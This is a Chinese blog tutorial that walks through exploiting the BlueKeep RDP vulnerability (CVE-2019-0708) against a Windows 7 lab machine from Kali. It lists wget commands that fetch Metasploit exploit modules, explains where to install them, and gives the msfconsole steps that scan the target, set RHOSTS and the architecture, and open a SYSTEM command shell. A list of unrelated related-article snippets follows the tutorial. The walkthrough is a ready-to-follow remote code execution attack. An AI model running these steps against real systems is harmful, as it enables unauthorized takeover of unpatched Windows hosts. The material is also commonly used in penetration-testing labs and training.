kali利用CVE_2019_0708(远程桌面代码执行漏洞)攻击win7

2023-05-16

一、漏洞说明
2019年5月15日微软发布安全补丁修复了CVE编号为CVE-2019-0708的Windows远程桌面服务(RDP)远程代码执行漏洞,该漏洞在不需身份认证的情况下即可远程触发,危害与影响面极大。

目前,9月7日EXP代码已被公开发布至metasploit-framework的Pull requests中,经测试已经可以远程代码执行。

二、影响版本
Windows 7
Windows server 2008 R2
Windows server 2008
Windows 2003
Windows xp

换个说法就是除了win8和win10,几乎所有版本都有此漏洞

三、开始攻击
依旧是我们的老演员:
kali机:192.138.198.134
win7:192.168.198.138

准备工作:

win7
1.关闭win7防火墙
2.开启3389端口(远程桌面连接)
3.静坐,待被日

kali:
1.更新你的msf(如果你的kali版本是2019.4及其以后的,可以跳过这步)

apt-get install metasploit-framework -->更新metasploit

2.下载此漏洞的exp

wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

3.将下载的文件添加或替换到相应目录

rdp.rb  - > /usr/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb -->替换
rdp_scanner.rb  - > /usr/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb -->替换
cve_2019_0708_bluekeep.rb  - > /usr/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb -->替换
cve_2019_0708_bluekeep_rce.rb  - > /usr/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb -->添加

正式开始
启动msfconsole,搜索0708特征码

msfconsole -->启动msf
search 0708 -->搜索关于0708的所有文件或模块

在这里插入图片描述
请看编号0

auxiliary/scanner/rdp/cve_2019_0708_bluekeep -->探测此漏洞模块

我们来使用它探测一下并查看它需要哪些参数

use auxiliary/scanner/rdp/cve_2019_0708_bluekeep -->使用此模块
show options -->查看所需参数

在这里插入图片描述
这里我们发现所有为yes的参数里面只有RHOSTS(主机地址)为空,那么我们来设置一下靶机的主机地址

set RHOSTS 192.168.198.138 -->设置RHOSTS的值为192.168.198.138
exploit -->开始攻击

在这里插入图片描述
几秒钟后得到了结果
请看倒数第5排:
The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.

懒得翻译,自己百度去,反正大意就是此主机可能受到此漏洞攻击

既然有漏洞了,那我们就开始攻击
请看图1的编号3

exploit/windows/rdp/cve_2019_0708_bluekeep_rce

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce -->使用攻击模块
show options -->查看所需参数
 set RHOSTS 192.168.198.138 -->设置RHOSTS的值为192.168.198.138
 set target 2 -->设置受害机器的架构(可选参数0-7)

在这里插入图片描述
这里不同以往,需要设置架构参数,小朋友们不要忘了哦
参数设置好以后就可以开始攻击了

exploit -->开始攻击

在这里插入图片描述
当出现Command shell session 1 opened时,证明你已经攻击成功了
此时你只需要按下回车便可
我们来查看一下效果
在这里插入图片描述
运行whoami,回显系统权限
运行ipconfig,回显192.168.198.138

好的,成功拿下
啧啧,我们可怜的win7

老话常说
有什么不懂的欢迎私信
如果我有哪点没讲清楚的,欢迎评论

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

kali利用CVE_2019_0708(远程桌面代码执行漏洞)攻击win7 的相关文章

  • Linux上的中文输入法安装(Ubuntu + Kali五笔拼音)

    Linux上的中文输入法安装Ubuntu Kali五笔拼音 1 输入法框架 2 输入法 3 操作系统 4 使用体验 5 安装输入法 6 输入配置 1 输入法框架 在Linux上 常见的输入法框架有三种 fcitx ibus xim 2 输入
  • nodejs开发环境安装

    安装环境 win7 64位 访问nodejs官网 http nodejs org 点击Download链接 选择Windows Installer 下载安装包 直接安装即可 安装成功后 在命令窗口 cmd node 查看是否成功 若果没有成
  • KaLi入门基础

    我的博客链接 blog kbai cc 学习KaLi 郑重声明 此文章可能会包含敏感以及危险的命令 命令有风险 回车需谨慎 此文章仅供学习交流与参考使用 禁止运用于任何非法行动或测试中 若有预期之外的后果 将不承担任何责任 再次进行警告与提
  • win7新建文本文档快捷键

    由于编者水平有限 文中难免会有错误和疏漏 请各位读者能提出宝贵建议或给予指正 可在博文下评论指出 我会及时改进 在此先感谢各位 本文是自己学习所做笔记 欢迎转载 但请注明出处 http blog csdn NET yijuanxia 环境
  • Premiere Pro cc 2019 全面使用教程(非常简单)

    视频剪辑工具 对于youtuber vloger 抖音播客都是必不可少的工具 一直关注pr终于有机会尝试一下 比较全面地记录一部短片的制作操作 一 安装 1 安装软件 2 crack 将此dll替换C Program Files Adobe
  • Kali使用VMware安装方法。

    Kali使用VMware安装方法以及修改中文界面 一直使用的Centos系统 今天我们换种口味 来玩玩kali 1 什么是kali 手指犹如轻快的舞步在键盘上不断地敲击着 清脆的咔擦声音刺回荡在空荡的房间 黑绿色的屏幕光反射在一张恐怖的面具
  • 2019年厦门大学计算机系夏令营经历

    2019 07 12 2019 07 15 厦门大学信息学院夏令营 计算机系笔试 上机 面试 一 笔试 数据结构 2019 07 13 填空题 一空三分 顺序存储 将一个数插到数字i下标的前面 需要移动多少个元素 m数组和n数组 最坏情况下
  • 简单分析 C 语言的 qsort() 源码

    简单分析 C 语言的 qsort 源码 stdlib h 是使用 C 语言需要引入的库 在系统文件下可以搜索到这个文件夹 在里面可以看到有一个 qsort 文件用编译器或者记事本打开就能看到里面的源码了 单从文件名看 qsort 采用的是快
  • vulhub安装时的问题

    在安装vulhub时 出现cannot import transport或者是无法导入其他的模块 从网上找到的方法都尝试之后均不行 这个文件夹明明存在 但是他就是说找不到 解决方法 在使用pip进行安装的时候 网上找的他们都是直接默认安装的
  • 红队靶场内网渗透(从DMZ主机渗透到域内机器)

    目录 一 红队靶场内网渗透 1 靶机工具下载 2 本实验网络拓扑图 3 内网渗透攻击流程 二 环境搭建 1 DMZ区win7 2 内网办公区 3 域控主机 三 开始攻击 1 DMZ区win7渗透 1 1信息收集 1 2收集到的信息 1 3远
  • vs静态编译解决找不到msvcp140.dll问题

    问题描述 win10中vs2015编写的程序生成release版本 拷贝到win7中运行 出现找不到msvcp140 dll问题 解决方法 将程序进行静态编译 1 使用release模式编译 2 项目属性中 C C 代码生成 中的运行库改为
  • 谷歌开源项目Chromium的源码获取与项目构建(Win7+vs10/vs13)

    从12年那会儿开始获取源码和构建chromium项目都是按照那时候的官方要求用win7 vs2010 相对来说也比较简单 按照步骤来也很快能编译出来 1 官网的编译配置介绍 http www chromium org developers
  • kali2022安装中国蚁剑(AndSword)

    软件包准备 AntSword 源码v2 1 15 下载地址 https github com AntSwordProject antSword archive refs tags 2 1 15 tar gz AntSword Loader加
  • 春秋云境:CVE-2022-22947

    春秋云境 CVE 2022 22947 文章合集 春秋云境系列靶场记录 合集 Spring Cloud Gateway spel 远程代码执行 CVE 2022 22947 漏洞介绍 Spring Cloud Gateway 远程代码执行漏
  • dc-3 靶机渗透学习

    靶机修复 dc 3靶机可能会存在扫不到靶机ip的问题 可以参考下面这篇博客解决 编辑网卡配置文件时命令有点错误 vim etc network interfacers 改成 vim etc network interfaces Vulnhu
  • 渗透Metasploitable主机

    攻击机 kali 靶机 Metasploitable2 一个特制的ubuntu操作系统 设计初衷作为安全工具测试和演示常见漏洞攻击的环境 默认开放高危端口如21 22 23 445 6000等等 而且具有很多未打补丁的高危漏洞 Metasp
  • XSS攻击实战

    一 XSS原理与分类 原理 XSS攻击全程跨站脚本攻击 恶意攻击者往Web页面里插入恶意Script代码 当用户浏览该页之时 嵌入其中Web里面的Script代码会被执行 从而达到恶意攻击用户的目的 与SQL注入类似 XSS也是利用提交恶意
  • Kali Linux介绍(安装教程)

    一 Kali Linux是什么 Kali Linux是基于Debian的Linux发行版 设计用于数字取证操作系统 每一季度更新一次 由Offensive Security Ltd维护和资助 最先由Offensive Security的Ma
  • Kali proxychains

    1 什么是proxychains 在linux系统中有很多软件是不支持代理的 但是proxychains 却可以让不支持代理的软件 也能走代理通道 支持HTTP HTTPS SOCKS4 SOCKS5 等多种代理协议 而且还能配置代理链 可
  • 第二章 常用安全工具

    目录 1 Kali系统工具分类 2 Kali Top10工具 1 Kali系统工具分类 信息收集 Information Gathering 主要目的是收集渗透测试目标的基本信息 包括操作系统信息 网络配置信息 应用服务信息等 脆弱性分析

随机推荐

  • in为什么慢

    IN为什么慢 xff1f 在应用程序中使用子查询后 xff0c SQL语句的查询性能变得非常糟糕 例如 xff1a SELECT driver id FROM driver where driver id in SELECT driver
  • 漫谈IT项目团队管理心得

    漫谈IT项目团队管理心得 如果在软件项目实施中选出最难解决的几个问题 xff0c 那么管理问题一定名列前茅 在管理问题中 xff0c 团队管理又是其中的难点 一个项目管理的好坏 xff0c 很大程度就体现在团队的建设和管理上 团队管理涉及到
  • error: [Errno 111] Connection refused

    用户cdh安装 hadoop的过程中 xff0c 启动CM xff0c 日志出现连接错误 cloudera 需要配置好dns xff0c 他是通过dns解析主机名来访问的 xff0c 这里可能dns解析有问题 xff0c 所以最好是把 us
  • dbca提示command not found

    1 dbca提示command not found 如果在database软件安装无错误后 xff0c 应该是环境变量找不到 2 检查环境变量 xff0c 果然有11 333 xff0c 这是远程粘贴板的问题吧 3 修改后 xff0c so
  • IT如何转为销售

    销售 xff0c 在很多人眼中是不入流的职业 不少人认为 xff0c 没有一技之长或没有能力才退而求其次去做一个销售 然而 xff0c 年薪50万的技术工程师 xff0c 马仁业为什么会放弃大家眼中神一样的职业 xff0c 去做一个没有底薪
  • MYSQL单行长度不能超过 65535

    报错 xff1a Row size too large The maximum row size for the used table type not counting BLOBs is 65535 mysql属于关系型 xff0c 行式
  • jdbcTemplate.batchUpdate在批量执行的时候,性能差没有效果,看看怎么解决的。

    我用的阿里druid数据库连接池 xff08 其实这个和连接池毛线关系没得 xff09 xff0c 创建jdbctemplate在执行insert 15000条数据时 xff0c 我发现还是30条 xff0c 20条 xff0c 35条这样
  • rabbit-mq 本地环境搭建

    一 xff1a 安装RabbitMQ需要先安装Erlang语言开发包 xff0c 直接下载地址 xff1a http erlang org download otp win64 18 3 exe 尽量安装时不选择C盘 xff0c 避免操作系
  • oracle小数点前面没有0,纠结解惑

    一1 天前台人找到我 xff0c 说我们安装的数据库有问题 xff0c 为什么小数点前面是0就不显示呢 xff0c 我去看了一下 xff0c command窗口要显示 SQL gt create table ml test num numb
  • 网监后台管理系统设计思路

    本次做的是网监系统saas服务平台的后台管理系统 xff0c 不涉及复杂功能逻辑 就是从菜单 模板 系 统 组织架构 角色 用户的设计思路 产品需求 xff1a 在各个省市网监系统的数量不断增长 xff0c 且系统逻辑和功能模块大致相同 x
  • 分类算法 c4.5 详解

    C4 5是一系列用在机器学习和数据挖掘的分类问题中的算法 它的目标是监督学习 xff1a 给定一个数据集 xff0c 其中的每一个元组都能用一组属性值来描述 xff0c 每一个元组属于一个互斥的类别中的某一类 C4 5的目标是通过学习 xf
  • 正则表达式匹配Html代码中图片路劲

    正则表达匹配图片路径 public static string GetHtmlImageUrlList string sHtmlText 定义正则表达式用来匹配 img 标签 Regex regImg 61 new Regex 64 34
  • (GPU版)Pytorch+pycharm+jupyter安装记录(截至23年3月14日)

    由于搞了一台旧主机 xff0c 主机上没有pytorch等软件程序 xff0c 所以重新装一遍 xff0c 顺便记录一下 xff01 一 安装显卡GPU的驱动程序 xff0c 搞定CUDA先 WIN 43 R打开命令行 xff0c 输入命令
  • Alibaba官方最新发布的这份Java学习导图+彩版手册,真不是吹的

    时间飞逝 xff0c 转眼间毕业七年多 xff0c 从事 Java 开发也六年了 我在想 xff0c 也是时候将自己的 Java 整理成一套体系 这一次的知识体系面试题涉及到 Java 知识部分 性能优化 微服务 并发编程 开源框架 分布式
  • linux下使用第三方商店安装应用

    安装 snap store 进行下载 xff0c 相当与第三方应用商店 xff0c 但是往往比某一个官方软件源里面的应用要丰富或更实用 到 snap docs 中选择你的 linux 版本进入安装文档 xff0c 根据指示一步一步安装即可
  • Centos7离线安装sqlserver2017

    Centos7离线安装sqlserver2017 根据操作系统版本选择下载匹配的sqlserver版本 可以在这里找一下https packages microsoft com config 我选择是先在一台有网的机器上下载好rpm安装包之
  • HC-05蓝牙模块配置

    目录 1 连接蓝牙模块a 蓝牙模块通过USB转TTL连接电脑b 打开串口助手 xff0c 波特率设置为38400c 检验是否连接成功 2 配置波特率3 修改密码4 设置主从模式5 设置蓝牙连接模式6 查询自身地址7 添加配对蓝牙地址8 测试
  • Windows沙盒技术调研

    转载自 xff1a 移动云开发者社区 一 Windows沙盒技术介绍 Windows沙盒提供了轻型桌面环境 xff0c 可安全地隔离运行应用程序 沙盒环境中Windows软件保持 34 沙盒 34 状态 xff0c 并独立于主机运行 沙盒是
  • OS + Linux Shell bash / sh / ksh / csh / tcsh / adb shell

    s Android adb shell ADB Android debug bridge Android手机实际是基于Linux系统的 Google提供的ADB工具包带有fastboot exe rar http dl iteye com
  • kali利用CVE_2019_0708(远程桌面代码执行漏洞)攻击win7

    一 漏洞说明 2019年5月15日微软发布安全补丁修复了CVE编号为CVE 2019 0708的Windows远程桌面服务 xff08 RDP xff09 远程代码执行漏洞 该漏洞在不需身份认证的情况下即可远程触发 危害与影响面极大 目前